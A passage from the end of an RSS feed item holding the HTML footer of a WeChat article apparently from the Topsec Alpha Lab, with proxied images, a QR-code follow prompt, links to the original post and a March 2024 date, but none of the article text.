src="https://wechat2rss.xlab.app/img-proxy/?k=5ba09fbc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FH6W1QCHf9dGfIEDOlNXXDTqOpRkEkicJakNxM37lzr8eRJRibEfxkwBibg9KpVh6nibXHoG4xC6KyGFtTd4TOe6GyA%2F640%3Fwx_fmt%3Dpng"/></p></section></section><section><section style="margin: 10px 0%;"><section style="display: inline-block;vertical-align: middle;width: 38%;box-shadow: rgb(0, 0, 0) 0px 0px 0px;padding-left: 10px;"><section><section style="margin-top: 10px;margin-bottom: 10px;"><section style="vertical-align: middle;display: inline-block;"><img class="rich_pages wxw-img" data-ratio="1" style="vertical-align: middle;width:auto !important;max-width:100% !important;height:auto !important;" data-type="jpeg" data-w="344" src="https://wechat2rss.xlab.app/img-proxy/?k=33f7228b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FH6W1QCHf9dGfIEDOlNXXDTqOpRkEkicJawf8nKyKatopPJiaayibAUCvfTVFKfxVDInq2TiaUib6xhmhpLK4Zqscgyg%2F640%3Fwx_fmt%3Djpeg"/></section></section></section></section><section style="display: inline-block;vertical-align: middle;width: 61.8%;"><section><section><section style="font-size: 14px;"><p><span style="font-family:Optima-Regular, PingFangTC-light;">天融信</span></p><p><span style="font-family:Optima-Regular, PingFangTC-light;">阿尔法实验室</span></p></section></section></section><section><section style="margin: 10px 0%;"><section style="display: inline-block;box-shadow: rgb(183, 28, 28) 0px 0px 0px inset;border-style: solid;border-width: 1px;border-radius: 5px;border-color: rgb(66, 66, 66);padding: 5px;background-color: rgb(252, 228, 236);"><section><section><section style="text-align: left;color: rgb(131, 129, 129);padding-right: 8px;padding-left: 8px;font-size: 14px;"><p><span style="font-family: Optima-Regular, PingFangTC-light;">长按二维码关注我们</span></p></section></section></section></section></section></section></section></section></section></section></section></section></section></section><section style="margin: -20px 0% 5px;text-align: center;"><br/></section></section><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247496594">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=362be71f&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg3MDAzMDQxNw%3D%3D%26mid%3D2247496594%26idx%3D1%26sn%3De09266aaa54a6ad0e8188a288084ef7f%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Sat, 30 Mar 2024 17:24:00 +0800</pubDate>
    </item>
  </channel>
</rss>